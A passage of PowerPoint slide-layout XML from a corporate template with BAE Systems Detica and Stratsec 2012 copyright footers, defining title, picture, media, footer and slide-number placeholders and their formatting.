            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent3"/>
              </a:gs>
              <a:gs pos="85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5" name="Straight Connector 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1347788"/>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descr="BAE_S_TITLE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BLACK DETICA LOGOTYP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287338"/>
            <a:ext cx="10080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p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="136525" y="6469063"/>
            <a:ext cx="3890809" cy="340093"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>© Stratsec.net Pty Ltd trading</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="800" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>BAE Systems Detica (2012). All rights reserved.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>BAE SYSTEMS and DETICA are trade marks of BAE Systems plc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238125" y="1608138"/>
            <a:ext cx="8572500" cy="460800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2400" b="1" cap="none">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238125" y="2060848"/>
            <a:ext cx="8572500" cy="4608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Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{236A1C52-0E92-40E4-A296-8E8E6EBE74A4}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="414746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460800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pP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4" name="Picture Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4377282"/>
            <a:ext cx="9144000" cy="1756817"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-GB" noProof="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="237146" y="2723778"/>
            <a:ext cx="8572500" cy="1281286"/>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accent3"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="0" indent="0" defTabSz="180975">
              <a:lnSpc>
                <a:spcPts val="2400"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>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GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{614690A6-DB21-46D3-97AA-333F75E53529}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3638519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8126" y="1600200"/>
            <a:ext cx="4137321" cy="4416039"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="1800"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="1800"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1600" baseline="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642F5E3D-6663-4633-920D-BA357B561BD3}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2123574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8126" y="1600200"/>
            <a:ext cx="4137321" cy="4416039"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="18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Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4664758" y="1600200"/>
            <a:ext cx="4137321" cy="4416039"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="18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CDFCA929-6E63-4D29-AC65-F9E3165F1357}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2564236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IMAGES x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8126" y="1600200"/>
            <a:ext cx="6692513" cy="4416039"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFontTx/>
              <a:buNone/>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endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Picture Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7092280" y="1599592"/>
            <a:ext cx="1709798" cy="991188"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-GB" noProof="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Picture Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7092280" y="5023241"/>
            <a:ext cx="1709798" cy="991188"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-GB" noProof="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Picture Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7092280" y="2740808"/>
            <a:ext cx="1709798" cy="991188"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-GB" noProof="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Picture Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7092280" y="3882024"/>
            <a:ext cx="1709798" cy="991188"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-GB" noProof="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{99ACB5EC-B1E4-4460-AF5E-DA8F1132401A}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="902440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9" name="Picture Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4675188" y="1599591"/>
            <a:ext cx="4126890" cy="4416647"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-GB" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238126" y="1600200"/>
            <a:ext cx="4137321" cy="4416039"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="18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98149908-7C37-4C16-B8DD-3694183AFB11}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="442927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 IMAGE onl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9" name="Picture Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="234950" y="1599591"/>
            <a:ext cx="8567128" cy="4416647"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-GB" noProof="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{7C82FC1D-31B7-458C-9A76-9C0C53AC12FE}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3969732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0" name="Media Placeholder 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="media" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238125" y="1606609"/>
            <a:ext cx="8564043" cy="4409629"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-GB" noProof="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00AADEA3-C908-48FD-BF81-35B642446AA2}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1039560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FOOTER ONLY Slide">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="136525" y="6443663"/>
            <a:ext cx="3163888" cy="349250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>© BAE Systems plc (2012). All rights reserved.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>BAE SYSTEMS and DETIC are trade marks of BAE Systems plc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6134100"/>
            <a:ext cx="9144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Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
